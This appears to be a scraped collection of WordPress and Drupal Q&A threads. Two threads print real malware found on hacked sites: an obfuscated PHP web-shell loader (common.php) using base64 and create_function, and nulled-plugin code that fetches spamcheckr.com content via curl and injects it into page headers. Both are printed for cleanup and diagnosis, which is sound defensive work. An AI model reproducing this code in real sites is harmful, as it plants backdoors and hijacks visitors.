corrupted / hacked common.php file? - wordpress

I am having issues with one of my wordpress sites. (constantly login out users and not letting people log in)
My hosting think the route is the common.php files (/public_html/wp-content/common.php )
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (abot 90,000!!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich

Delete the file.
It is not a part of the WordPress install or uprade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress

Related

Wordpress multisite separate media folders plus a shared media folder?

So, I have moved my wp-content folder (and renamed it), and renamed my uploads folder. I will end up having 60+ sites in this install eventually, and it was rather annoying to look inside "uploads/sites" and just see each one labeled with the site id #, which doesn't tell me anything about which site it belongs to. So I had found a function that allowed me to create new folders for each sub-site. And that's working great and all. But I would also like to have one folder with assets that can be shared across the network, instead of having to upload to the individual sites. In other words, I need BOTH the individual media folders, AND a universal assets folder. I suspect that the code I have for creating the named media folders may interfere somehow, but I'm not sure how to solve that. Any help will be appreciated. Following is my current function (which has been put into a plugin so it's not template-dependent).
Note: I feel like there's a better way to set the baseurl & basedir using the UPLOADS folder defined in config. But I couldn't figure out how to get that to work properly.
add_action('init', 'new_upload_filters');
function new_upload_filters(){
add_filter('upload_dir', 'new_upload_dir');
}
function new_upload_dir( $dirs ) {
$blog = get_current_blog_id();
$site = get_blog_details()->blogname;
$sitestrip = str_replace(' ', '', $site);
$sitespace = strtolower($sitestrip);
$dirs['baseurl'] = network_site_url( WP_CONTENT_URL . '/library' );
$dirs['basedir'] = WP_CONTENT_DIR . '/library';
$dirs['path'] = $dirs['basedir']. '/' . $sitespace;
$dirs['url'] = $dirs['baseurl']. '/' . $sitespace;
return $dirs;
}
This code results in a path for each sub-site of /primary-network-url.com/content-dir/library/blogname, which is great (though I'd still also like to have the images broken out by date within each blogname folder too, but that's less important).
In my mind, the ideal would be to have an item within the Admin/Media area for "Shared Images", like a separate category or something. Be able to upload items to that "shared images" area from the parent site, and then those are also available to the sub-sites (but only able to add or delete those from the super admin).
Is this even reasonably possible?

WordPress upload file

I would like to upload a file like as (.apk) but I can't. I receive this message.
Sorry, this file type is not allowed for security reasons.
I show solutions as to settings on multisite, but I don't have this choice on my version. In which way I could enable the settings of multisite?
Is there any way to upload files like apk,( may a plugin)?
Thank you in advance!
Open your functions.php file and add the following code inside it.
add_filter('upload_mimes', 'allow_custom_mimes');
function allow_custom_mimes ( $existing_mimes = array() ) {
// with mime type ‘application/vnd.android.package-archive
$existing_mimes['apk'] = 'application/vnd.android.package-archive';
return $existing_mimes;
}
Restart your server after adding code and check.

WordPress blog infected with HTML Refresh meta tag

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today.
4-5 days ago I realized that my blog's homepage after some seconds of loading was redirected to another page. Specifically to youtube, at a Justin Bieber video. I thought it was my computer's problem, so I scanned or viruses and malware. But it wasn't my fault.
Finally I was sure that it was not a local problem because Google pagespeed insights had the same result.
So, after many hours of research (and some broken keyboards) I found out those clues. In details:
A meta tag was created inside my header similar to this:
<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">
First, I disabled all my plugins but without result. After a while the problem was still there.
Second, I searched all my database tables to find out if the URL of the video was included somewhere, but it wasn't.
Then I searched in my template editor one by one the php files, but nothing.
.htaccess was also clear (not 100% sure what I was looking for in there, but I think there was nothing suspicious).
After all these, I downloaded via FTP my whole site, and searched inside every file for this URL. I found that it was included to some HTML files of the CACHE folder. I use W3 Total Cache for that purpose. I deleted the whole cache folder, but after a while the problem was still there.
The fun fact here is that this "virus" is not always active. It appears at random time, at different page each time. Also tonight I realized that it appeared on a second computer, the same time that everything looked fine on my computer.
The Youtube Video URL is: http:// www.youtube.com/watch?v=RFngSCaY5nA
So my question is: Does anyone of you have a solution to recommend before deleting the whole installation and start from the beginning? Does anyone else had the same problem wit me in the past?
I think that's all l have to share. I'm sorry for the long post, tried to be as detailed as possible. I'm not good at coding, this is my first attempt to run a WordPress site so, there might be something that I forgot.
Thanks in advance.
I have the same problem and think I found the solution!
Check your site files for this link: http://spamcheckr.com/l.php
I found this link in formcraft plugin.
Like this:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
Edited:
Also check for this: http://spamcheckr.com/req.php
I have found this script in the wordpress fooboxV2 plugin.(FooBox)
Plugin official url is http://fooplugins.com/plugins/foobox/
This is the script file path
/wp-content/plugins/fooboxV2/includes/foolic_class.php
You can see whole scripts are commented.But I found this code in that commented code.
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>
If you are using a nulled version of Gravity Forms you might also get this redirection problem. To solve the problem go to /plugins/gravityforms/settings/setting.php and remove the following code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>
Good luck.
Good answer above. To add to it, I recommend using grep to anyone who has trouble searching for the code :
grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content
If you don't have grep and cant access your server (windows users) download it or use findstr :
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
(Dont forget to change /www/wordpress/wp-content to the location or your wordpress folders
Found it, too. In my case I was using an apparently nulled plug-in (which I didn't realize). It's called woocommerce-checkout-field-editor and was injecting a link to a Justin Bieber youtube video.
The function looks like this and is was hidden in \wp-content\plugins\woocommerce-checkout-field-editor\assets\js\class.php:
if (mt_rand(0,99) == 1) {
function sec_check() {
if(function_exists('curl_init'))
{
$url = "spamcheckr.com/req.php";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head','sec_check');
}
As we can see, it only displays the spam when a random function hits '1'. Then, it politely asks to see if curl is installed and then sends a simple GET request to the spam server to see what code it should be injecting.
The site is spamcheckr.com.
It then adds itself into the WordPress header and redirects the viewer of the page.
I reported the site to their host and let's see what happens.

Getting path to Drupal root while in module

I am not sure if this is an issue with my current setup, or what I want to do.
I have a module that is programatically creating nodes in my Drupal 6 site, and within each I have to provide links in between various nodes.
I basically have a few foreach loops, and within each I have the current path.
For instance:
foreach ($page->category as $category) {
$category_link = "category/" . $category['id'];
// generate category pages
...
$content = "<a href='$category_link'>".$category['name']."</a>";
_create_node($content);
foreach ($category->article as $article) {
$article_link = $category_link . "/article/" . $article['id'];
// generate article page
$content = "<a href='$category_link'>".$category['name']."</a>";
$content .= "<a href='$article_link'>".$article['name']."</a>";
_create_node($content);
}
}
The issue that I'm seeing is that the link seems to be continually built up.
For instance, in the main category pages it is fine (I'll see category/1234), and the article link will be fine, but the category link will seem to be longer than it should. Basically, I'll end up seeing:
category/1234/article/5678/category/1234
My first thought was to make use of $base_url and just create absolute paths, however whenever I try printing that variable from my module it is completely empty. This is on a local server, however when I move it to production Drupal isn't installed at the root, so I can't simply add a slash to the front of the link.
Try using $GLOBALS['base_path'] to get the base path.
$GLOBALS['base_path'] will work, but you are accessing a global variable that ALSO contains some things like your database connection info and some other important stuff. So with a slip of the finger you could muck up other things. I prefer base_path() which does the same thing but is a modicum safer.
Use
global $base_url;
For path to themes folder use
path_to_theme()
You can use base_path() but that will not provide you with the domain name.
Base url will provide you the complete url like : www.example.com
base_path() will give you : /
path_to_theme() will give you : sites/all/themes/yourthemename

file upload issue in drupal, all files are submitted to /tmp instead of location stated

Here is the code which I use to upload (drupal 6)
echo "DIR".$dir = drupal_get_path('module', 'modulename') . '/files';
if($docfile = file_save_upload('document',$dir))
echo "success:".$docfile->filepath;
It shows output as success:/tmp/Winter_0.jpg and I see the file uploaded to /tmp folder instead of my modulename/files folder. Can any one help me in fixing this.
You're calling file_save_upload with the wrong parameters. Refer to the file_save_upload API docs for the relevant information.
If I understood the syntax correctly, the following oughta work:
echo "DIR".$dir = drupal_get_path('module', 'modulename') . '/files';
if($docfile = file_save_upload('document', null, $dir))
echo "success:".$docfile->filepath;
Another possibility is that you need to tell Drupal that the file is not a temporary file.
file_set_status($file, FILE_STATUS_PERMANENT);
edit:
Just go with the link wimvds gave, read the docs, and test around what the correct syntax is. Perhaps the directory you are saving the file is wrong? Try /sites/all/files or /sites/default/files instead of trying to put it into the module folder where apache probably does not even have read/write rights, at least I'm unsure if Drupal lets us store files there.
Another take on reading the API would make me try file_save_upload($yourfile, array(), $destination_directory, FILE_EXISTS_REPLACE);

Resources